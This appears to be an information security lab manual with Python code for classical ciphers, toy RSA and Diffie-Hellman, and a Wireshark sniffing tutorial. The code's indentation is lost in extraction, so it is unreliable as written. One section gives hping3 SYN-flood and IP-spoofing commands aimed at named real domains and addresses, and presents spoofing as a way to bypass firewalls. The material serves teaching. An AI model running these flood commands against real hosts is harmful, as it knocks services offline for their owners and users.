CREATE NETWORK USING CISCO

PACKET TRACER
CREATE NETWORK IN LOCAL AREA
NETWORK
PLAYFAIR CIPHER
# Python program to implement Playfair Cipher

# Function to convert the string to lowercase

def toLowerCase(text):
return text.lower()

# Function to remove all spaces in a string

def removeSpaces(text):
newText = ""
for i in text:
if i == " ":
continue
else:
newText = newText + i
return newText

# Function to group 2 elements of a string

# as a list element

def Diagraph(text):
Diagraph = []
group = 0
for i in range(2, len(text), 2):
 Diagraph.append(text[group:i])

group = i
Diagraph.append(text[group:])
return Diagraph

# Function to fill a letter in a string element

# If 2 letters in the same string matches

def FillerLetter(text):
k = len(text)
if k % 2 == 0:
for i in range(0, k, 2):
if text[i] == text[i+1]:
new_word = text[0:i+1] + str('x') + text[i+1:]
new_word = FillerLetter(new_word)
break
else:
new_word = text
else:
for i in range(0, k-1, 2):
if text[i] == text[i+1]:
new_word = text[0:i+1] + str('x') + text[i+1:]
new_word = FillerLetter(new_word)
break
else:
new_word = text
return new_word
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']

# Function to generate the 5x5 key square matrix

def generateKeyTable(word, list1):

key_letters = []
for i in word:
if i not in key_letters:
key_letters.append(i)

compElements = []
for i in key_letters:
if i not in compElements:
compElements.append(i)
for i in list1:
if i not in compElements:
compElements.append(i)

matrix = []
while compElements != []:
matrix.append(compElements[:5])
compElements = compElements[5:]

return matrix
def search(mat, element):
for i in range(5):
for j in range(5):
if(mat[i][j] == element):
return i, j

def encrypt_RowRule(matr, e1r, e1c, e2r, e2c):

char1 = ''
if e1c == 4:
char1 = matr[e1r][0]
else:
char1 = matr[e1r][e1c+1]

char2 = ''
if e2c == 4:
char2 = matr[e2r][0]
else:
char2 = matr[e2r][e2c+1]

return char1, char2

def encrypt_ColumnRule(matr, e1r, e1c, e2r, e2c):

char1 = ''
if e1r == 4:
char1 = matr[0][e1c]
else:
 char1 = matr[e1r+1][e1c]

char2 = ''
if e2r == 4:
char2 = matr[0][e2c]
else:
char2 = matr[e2r+1][e2c]

return char1, char2

def encrypt_RectangleRule(matr, e1r, e1c, e2r, e2c):

char1 = ''
char1 = matr[e1r][e2c]

char2 = ''
char2 = matr[e2r][e1c]

return char1, char2

def encryptByPlayfairCipher(Matrix, plainList):

CipherText = []
for i in range(0, len(plainList)):
c1 = 0
c2 = 0
ele1_x, ele1_y = search(Matrix, plainList[i][0])
ele2_x, ele2_y = search(Matrix, plainList[i][1])
 if ele1_x == ele2_x:
c1, c2 = encrypt_RowRule(Matrix, ele1_x, ele1_y, ele2_x, ele2_y)
# Get 2 letter cipherText
elif ele1_y == ele2_y:
c1, c2 = encrypt_ColumnRule(Matrix, ele1_x, ele1_y, ele2_x, ele2_y)
else:
c1, c2 = encrypt_RectangleRule(
Matrix, ele1_x, ele1_y, ele2_x, ele2_y)

cipher = c1 + c2
CipherText.append(cipher)
return CipherText

text_Plain = 'instruments'
text_Plain = removeSpaces(toLowerCase(text_Plain))
PlainTextList = Diagraph(FillerLetter(text_Plain))
if len(PlainTextList[-1]) != 2:
PlainTextList[-1] = PlainTextList[-1]+'z'

key = "Monarchy"
print("Key text:", key)
key = toLowerCase(key)
Matrix = generateKeyTable(key, list1)

print("Plain Text:", text_Plain)

CipherList = encryptByPlayfairCipher(Matrix, PlainTextList)

CipherText = ""
for i in CipherList:
CipherText += i
print("CipherText:", CipherText)

OUTPUT: -
Key text: Monarchy
Plain Text: instruments
CipherText: gatlmzclrqtx
POLYALPHABETIC CIPHER
# Python code to implement
# Vigenere Cipher

# This function generates the

# key in a cyclic manner until
# it's length isn't equal to
# the length of original text
def generateKey(string, key):
key = list(key)
if len(string) == len(key):
return(key)
else:
for i in range(len(string) -
len(key)):
key.append(key[i % len(key)])
return("" . join(key))

# This function returns the

# encrypted text generated
# with the help of the key
def cipherText(string, key):
cipher_text = []
for i in range(len(string)):
x = (ord(string[i]) +
ord(key[i])) % 26
x += ord('A')
cipher_text.append(chr(x))
return("" . join(cipher_text))
# This function decrypts the
# encrypted text and returns
# the original text
def originalText(cipher_text, key):
orig_text = []
for i in range(len(cipher_text)):
x = (ord(cipher_text[i]) -
ord(key[i]) + 26) % 26
x += ord('A')
orig_text.append(chr(x))
return("" . join(orig_text))

# Driver code
if __name__ == "__main__":
string = "GEEKSFORGEEKS"
keyword = "AYUSH"
key = generateKey(string, keyword)
cipher_text = cipherText(string,key)
print("Ciphertext :", cipher_text)
print("Original/Decrypted Text :", originalText(cipher_text, key))

OUTPUT:-
Ciphertext : GCYCZFMLYLEIM
Original/Decrypted Text : GEEKSFORGEEKS
SIMPLE AND COLUMNAR CIPHER

# Python3 implementation of
# Columnar Transposition
import math

key = "HACK"

# Encryption
def encryptMessage(msg):
cipher = ""

# track key indices

k_indx = 0

msg_len = float(len(msg))
msg_lst = list(msg)
key_lst = sorted(list(key))

# calculate column of the matrix

col = len(key)

# calculate maximum row of the matrix

row = int(math.ceil(msg_len / col))

# add the padding character '_' in empty

# the empty cell of the matix
fill_null = int((row * col) - msg_len)
msg_lst.extend('_' * fill_null)
 # create Matrix and insert message and
# padding characters row-wise
matrix = [msg_lst[i: i + col]
for i in range(0, len(msg_lst), col)]

# read matrix column-wise using key

for _ in range(col):
curr_idx = key.index(key_lst[k_indx])
cipher += ''.join([row[curr_idx]
for row in matrix])
k_indx += 1

return cipher

# Decryption
def decryptMessage(cipher):
msg = ""

# track key indices

k_indx = 0

# track msg indices

msg_indx = 0
msg_len = float(len(cipher))
msg_lst = list(cipher)

# calculate column of the matrix

col = len(key)
# calculate maximum row of the matrix
row = int(math.ceil(msg_len / col))

# convert key into list and sort

# alphabetically so we can access
# each character by its alphabetical position.
key_lst = sorted(list(key))

# create an empty matrix to

# store deciphered message
dec_cipher = []
for _ in range(row):
dec_cipher += [[None] * col]

# Arrange the matrix column wise according

# to permutation order by adding into new matrix
for _ in range(col):
curr_idx = key.index(key_lst[k_indx])

for j in range(row):
dec_cipher[j][curr_idx] = msg_lst[msg_indx]
msg_indx += 1
k_indx += 1

# convert decrypted msg matrix into a string

try:
msg = ''.join(sum(dec_cipher, []))
except TypeError:
 raise TypeError("This program cannot",
"handle repeating words.")

null_count = msg.count('_')

if null_count > 0:
return msg[: -null_count]

return msg

# Driver Code
msg = "Geeks for Geeks"

cipher = encryptMessage(msg)
print("Encrypted Message: {}".
format(cipher))

print("Decryped Message: {}".

format(decryptMessage(cipher)))

OUTPUT: -
Encrypted Message: e kefGsGsrekoe_
Decryped Message: Geeks for Geeks
SIMPLIFIED DES
def shift(arr, n):
return arr[n:] + arr[:n]

def binary(val):
if val == 0:
return "00"
elif val == 1:
return "01"
elif val == 2:
return "10"
else:
return "11"

class GFG:
def __init__(self):
self.key = [1, 0, 1, 0, 0, 0, 0, 0, 1, 0]
self.P10 = [3, 5, 2, 7, 4, 10, 1, 9, 8, 6]
self.P8 = [6, 3, 7, 4, 8, 5, 10, 9]

self.key1 = [0] * 8
self.key2 = [0] * 8

self.IP = [2, 6, 3, 1, 4, 8, 5, 7]
self.EP = [4, 1, 2, 3, 2, 3, 4, 1]
self.P4 = [2, 4, 3, 1]
self.IP_inv = [4, 1, 3, 5, 7, 2, 8, 6]

self.S0 = [[1, 0, 3, 2],

 [3, 2, 1, 0],
[0, 2, 1, 3],
[3, 1, 3, 2]]
self.S1 = [[0, 1, 2, 3],
[2, 0, 1, 3],
[3, 0, 1, 0],
[2, 1, 0, 3]]

def key_generation(self):
key_ = [self.key[i-1] for i in self.P10]

Ls = key_[:5]
Rs = key_[5:]

Ls_1 = shift(Ls, 1)
Rs_1 = shift(Rs, 1)

key_[:5] = Ls_1
key_[5:] = Rs_1

self.key1 = [key_[i-1] for i in self.P8]

Ls_2 = shift(Ls, 2)
Rs_2 = shift(Rs, 2)

key_[:5] = Ls_2
key_[5:] = Rs_2

self.key2 = [key_[i-1] for i in self.P8]

 print("Your Key-1 :")
print(' '.join(map(str, self.key1)))

print("\nYour Key-2 :")

print(' '.join(map(str, self.key2)))

def encryption(self, plaintext):

arr = [plaintext[i-1] for i in self.IP]

arr1 = self.function_(arr, self.key1)

after_swap = shift(arr1, len(arr1) // 2)

arr2 = self.function_(after_swap, self.key2)

ciphertext = [arr2[i-1] for i in self.IP_inv]

return ciphertext
def function_(self, ar, key_):
l = ar[:4]
r = ar[4:]

ep = [r[i-1] for i in self.EP]

ar = [key_[i] ^ ep[i] for i in range(8)]

l_1 = ar[:4]
r_1 = ar[4:]
 row = int(f"{l_1[0]}{l_1[3]}", 2)
col = int(f"{l_1[1]}{l_1[2]}", 2)
val = self.S0[row][col]
str_l = binary(val)

row = int(f"{r_1[0]}{r_1[3]}", 2)
col = int(f"{r_1[1]}{r_1[2]}", 2)
val = self.S1[row][col]
str_r = binary(val)

r_ = [int(c) for c in str_l + str_r]

r_p4 = [r_[i-1] for i in self.P4]

l = [l[i] ^ r_p4[i] for i in range(4)]

output = l + r
return output

def decryption(self, ar):

arr = [ar[i-1] for i in self.IP]

arr1 = self.function_(arr, self.key2)

after_swap = shift(arr1, len(arr1) // 2)

arr2 = self.function_(after_swap, self.key1)

decrypted = [arr2[i-1] for i in self.IP_inv]
 return decrypted
if __name__ == "__main__":
obj = GFG()
obj.key_generation()

plaintext = [1, 0, 0, 1, 0, 1, 1, 1]
print("\nYour plain Text is :")
print(' '.join(map(str, plaintext)))

ciphertext = obj.encryption(plaintext)

print("\nYour cipher Text is :")

print(' '.join(map(str, ciphertext)))

decrypted = obj.decryption(ciphertext)

print("\nYour decrypted Text is :")

print(' '.join(map(str, decrypted)))

OUTPUT: -
Your Key-1 :
10100100

Your Key-2 :
10010010

Your plain Text is :

10010111

Your cipher Text is :

10111000

Your decrypted Text is :

10010111
SIMPLE RSA ALGORITHM
# Python for RSA asymmetric cryptographic algorithm.
# For demonstration, values are
# relatively small compared to practical application
import math

def gcd(a, h):

temp = 0
while(1):
temp = a % h
if (temp == 0):
return h
a=h
h = temp

p=3
q=7
n = p*q
e=2
phi = (p-1)*(q-1)

while (e < phi):

# e must be co-prime to phi and

# smaller than phi.
if(gcd(e, phi) == 1):
break
 else:
e = e+1

# Private key (d stands for decrypt)

# choosing d such that it satisfies
# d*e = 1 + k * totient

k=2
d = (1 + (k*phi))/e

# Message to be encrypted
msg = 12.0

print("Message data = ", msg)

# Encryption c = (msg ^ e) % n
c = pow(msg, e)
c = math.fmod(c, n)
print("Encrypted data = ", c)

# Decryption m = (c ^ d) % n
m = pow(c, d)
m = math.fmod(m, n)
print("Original Message Sent = ", m)

OUTPUT: -
Message data = 12.0
Encrypted data = 3.0
Original Message Sent = 12.0
DIFFIE HELLMAN
from random import randint
if __name__ == '__main__':
# Both the persons will be agreed upon the
# public keys G and P
# A prime number P is taken
P = 23
# A primitive root for P, G is taken
G=9
print('The Value of P is :%d'%(P))
print('The Value of G is :%d'%(G))
# Alice will choose the private key a
a=4
print('The Private Key a for Alice is :%d'%(a))
# gets the generated key
x = int(pow(G,a,P))
# Bob will choose the private key b
b=3
print('The Private Key b for Bob is :%d'%(b))
# gets the generated key
y = int(pow(G,b,P))
# Secret key for Alice
ka = int(pow(y,a,P))
# Secret key for Bob
kb = int(pow(x,b,P))
print('Secret key for the Alice is : %d'%(ka))
print('Secret Key for the Bob is : %d'%(kb))
TO STUDY DOS AND DDOS ATTACK
USING H-PING
Getting Started With hping3
To install hping3 on Debian and its based Linux distributions including Ubuntu, use the

apt packages manager as shown in the screenshot below. sudo apt install hping3 –y :

On CentOS or RedHat based Linux distributions, you can install hping3 using yum as shown
below.

sudo yum -y install hping3

A simple DOS (not DDOS) attack would be:

sudo hping3 -S --flood -V -p 80 170.155.9.185
Where:

• sudo: gives needed privileges to run hping3.

• hping3: calls hping3 program.
• -S: specifies SYN packets.
• –flood: replies will be ignored and packets will be sent as fast as possible.
• -V: Verbosity.
• -p 80: port 80, you can replace this number for the service you want to attack.
170.155.9.185: target IP.
•
Flood Using SYN Packets Against Port 80
SYN packets include the connection synchronization confirmation request.

The following example shows a SYN attack against lacampora.org:

sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-

source

Where:

• lacampora.org: is the target, this time defined with a domain name.

• -q: brief output
• -n: shows target IP instead of host.
• -d 120: sets packet size
• –rand-source: hides IP address.

sudo hping3 --rand-source ivan.com -S -q -p 80 --flood

Flood From a Fake IP Address With hping3
With hping3 you can also attack your targets with a fake IP. In order to bypass a firewall, you
can even clone your target IP itself, or any allowed address you may know (you can achieve it for
example with Nmap or a sniffer to listen to established connections).

The syntax is the following:

sudo hping3 -a <FAKE IP> <target> -S -q -p 80

In the example below, I replaced my real IP address with the IP 190.0.174.10.

sudo hping3 -a 190.0.174.10 190.0.175.100 -S -q -p 80

 Information Security Lab

Experiment No. 10
TITLE: Implement packet sniffing using Wireshark and TCP dump.

HARDWARE CONFIGURATION / KIT:

Sr. No Hardware Configuration

1 Processor 1.5GHz or more
2 RAM 512 MB Minimum
3 HDD Minimum 900MB free Space
4 Standard I/O devices

SOFTWARE CONFIGURATION:

Sr. No Software Configuration

1 Operating System Windows XP or later
2 Anaconda Jupyter Notebook Python 3

THEORY:

Few tools are as useful to the IT professional as Wireshark, the go-to network packet capture tool.
Wireshark will help you capture network packets and display them at a granular level. Once these
packets are broken down, you can use them for real-time or offline analysis. This tool lets you put
your network traffic under a microscope, and then filter and drill down into it, zooming in on the
root cause of problems, assisting with network analysis and ultimately network security. This free
Wireshark tutorial will teach you how to capture, interpret, filter and inspect data packets to
effectively troubleshoot.

What Is Wireshark?

Wireshark is a network protocol analyzer, or an application that captures packets from a network
connection, such as from your computer to your home office or the internet. Packet is the name
given to a discrete unit of data in a typical Ethernet network.

Wireshark is the most often-used packet sniffer in the world. Like any other packet sniffer,
Wireshark does three things:

1. Packet Capture: Wireshark listens to a network connection in real time and then grabs
entire streams of traffic – quite possibly tens of thousands of packets at a time.
2. Filtering: Wireshark is capable of slicing and dicing all of this random live data using
filters. By applying a filter, you can obtain just the information you need to see.

61
 Information Security Lab

3. Visualization: Wireshark, like any good packet sniffer, allows you to dive right into the
very middle of a network packet. It also allows you to visualize entire conversations and
network streams.

Figure 1: Viewing a packet capture in Wireshark

Packet sniffing can be compared to spelunking – going inside a cave and hiking around. Folks who
use Wireshark on a network are kind of like those who use flashlights to see what cool things they
can find. After all, when using Wireshark on a network connection (or a flashlight in a cave),
you’re effectively using a tool to hunt around tunnels and tubes to see what you can see.

What Is Wireshark Used For?

Wireshark has many uses, including troubleshooting networks that have performance issues.
Cybersecurity professionals often use Wireshark to trace connections, view the contents of suspect

62
 Information Security Lab

network transactions and identify bursts of network traffic. It’s a major part of any IT pro’s toolkit
– and hopefully, the IT pro has the knowledge to use it.

When Should Wireshark Be Used?

Wireshark is a safe tool used by government agencies, educational institutions, corporations, small
businesses and nonprofits alike to troubleshoot network issues. Additionally, Wireshark can be
used as a learning tool.

Those new to information security can use Wireshark as a tool to understand network traffic
analysis, how communication takes place when particular protocols are involved and where it goes
wrong when certain issues occur.

Of course, Wireshark can’t do everything.

First of all, it can’t help a user who has little understanding of network protocols. No tool, no
matter how cool, replaces knowledge very well. In other words, to properly use Wireshark, you
need to learn exactly how a network operates. That means, you need to understand things such as
the three-way TCP handshake and various protocols, including TCP, UDP, DHCP and ICMP.

Second, Wireshark can’t grab traffic from all of the other systems on the network under normal
circumstances. On modern networks that use devices called switches, Wireshark (or any other
standard packet-capturing tool) can only sniff traffic between your local computer and the remote
system it is talking to.

Third, while Wireshark can show malformed packets and apply color coding, it doesn’t have actual
alerts; Wireshark isn’t an intrusion detection system (IDS).

Fourth, Wireshark can’t help with decryption with regards to encrypted traffic.

And finally, it is quite easy to spoof IPv4 packets. Wireshark can’t really tell you if a particular IP
address it finds in a captured packet is a real one or not. That requires a bit more know-how on the
part of an IT pro, as well as additional software.

63
 Information Security Lab

Common Wireshark Use Cases

Here’s a common example of how a Wireshark capture can assist in identifying a problem. The
figure below shows an issue on a home network, where the internet connection was very slow.

As the figure shows, the router thought a common destination was unreachable. This was
discovered by drilling down into the IPv6 Internet Message Control Protocol (ICMP) traffic, which
is marked in black. In Wireshark, any packet marked in black is considered to reflect some sort of
issue.

Figure 2: Drilling down into a packet to identify a network problem using Wireshark

In this case, Wireshark helped determine that the router wasn’t working properly and couldn’t find
YouTube very easily. The problem was resolved by restarting the cable modem. Of course, while
this particular problem didn’t necessitate using Wireshark, it’s kind of cool to authoritatively
finalize the issue.

64
 Information Security Lab

When you take another look at the bottom of Figure 2, you can see that a specific packet is
highlighted. This shows the innards of a TCP packet that is part of a transport layer security (TLS)
conversation. This is a great example of how you can drill down into the captured packet.

Using Wireshark doesn’t allow you to read the encrypted contents of the packet, but you can
identify the version of TLS the browser and YouTube are using to encrypt things. Interestingly
enough, the encryption shifted to TLS version 1.2 during the listening.

Wireshark is often used to identify more complex network issues. For example, if a network
experiences too many retransmissions, congestion can occur. By using Wireshark, you can identify
specific retransmission issues, as shown below in Figure 3.

Figure 3: Viewing packet flow statistics using Wireshark to identify retransmissions

By confirming this type of issue, you can then reconfigure the router or switch to speed up traffic.

65
 Information Security Lab

How to Use Wireshark

You can download Wireshark for free at www.wireshark.org. It’s also freely available, as an open
source application under the GNU General Public License version 2.

How to Install Wireshark on Windows

If you’re a Windows operating system user, download the version appropriate for your particular
version. If you use Windows 10, for example, you’d grab the 64-bit Windows installer and follow
the wizard to install. To install, you’ll need administrator permissions.

How to Install Wireshark on Linux

If you have a Linux system, you’d install Wireshark using the following sequence (notice that
you’ll need to have root permissions):

$ sudo apt-get install wireshark

$ sudo dpkg-reconfigure wireshark-common

$ sudo usermod -a -G wireshark $USER

$ newgrp wireshark

Once you have completed the above steps, you then log out and log back in, and then start
Wireshark:

$ wireshark &

How to Capture Packets Using Wireshark

Once you’ve installed Wireshark, you can start grabbing network traffic. But remember: To capture
any packets, you need to have proper permissions on your computer to put Wireshark into
promiscuous mode.

 In a Windows system, this usually means you have administrator access.

 In a Linux system, it usually means that you have root access.

66
 Information Security Lab

As long as you have the right permissions, you have several options to actually start the
capture. Perhaps the best is to select Capture >> Options from the main window. This will
bring up the Capture Interfaces window, as shown below in Figure 4.

Figure 4: The Capture Interfaces dialog in Wireshark

This window will list all available interfaces. In this case, Wireshark provides several to
choose from.

For this example, we’ll select the Ethernet 3 interface, which is the most active interface.
Wireshark visualizes the traffic by showing a moving line, which represents the packets on
the network.

Once the network interface is selected, you simply click the Start button to begin your
capture. As the capture begins, it’s possible to view the packets that appear on the screen, as
shown in Figure 5, below.

67
 Information Security Lab

Figure 5: Wireshark capturing packets

Once you have captured all the packets that you want, simply click the red, square button at
the top. Now you have a static packet capture to investigate.

Figure 6: Default coloring rules

68
 Information Security Lab

You can even change the defaults or apply a custom rule. If you don’t want any coloring at
all, go to View, then click Colorize Packet List. It’s a toggle, so if you want the coloring
back, simply go back and click Colorize Packet List again. It’s possible, even, to colorize
specific conversations between computers.

In Figure 7 below, you can see standard UDP (light blue), TCP (light purple), TCP
handshake (dark gray) and routing traffic (yellow).

Figure 7: Viewing colorized packets in Wireshark

However, you’re not limited to just interpreting by color. It’s possible to view the
input/output (I/O) statistics of an entire packet capture.

In Wireshark, just go to Statistics >> I/O Graph, and you’ll see a graph similar to the one
shown in Figure 8.

69
 Information Security Lab

Figure 8: Viewing the input/output traffic graph in Wireshark

This particular graph is showing typical traffic generated by a home office. The spikes in
the graph are bursts of traffic that were caused by generating a Distributed Denial of Service
(DDoS) attack using a few Linux systems.

In this case, three major traffic bursts were generated. Many times, cybersecurity pros use
Wireshark as a quick and dirty way to identify traffic bursts during attacks.

It’s also possible to capture the amount of traffic generated between one system and
another. If you go to Statistics and then select Conversations, you will see a summary of
conversations between end points, as shown below in Figure 9.

70
 Information Security Lab

Figure 9: Viewing endpoint conversations in Wireshark

In the above case, Wireshark was used to see if an old piece of equipment from MCI
communications that was running on a client’s network could be traced.

It turned out that the client didn’t know this device was even on the network. Thus, it was
removed, helping to make the network a bit more secure. Notice, also, that this network
connection is experiencing a lot of traffic to Amazon (administering a server in AWS at the
time) and Box.com (using Box for system backup at the time).

In some cases, it is even possible to use Wireshark to identify the geographic location of
source and destination traffic. If you click on the Map button at the bottom of the screen
(shown in Figure 9 above), Wireshark will show you a map (Figure 10), providing its best
guess of the location of the IP addresses you’ve identified.

71
TO STUDY HIDS AND NIDS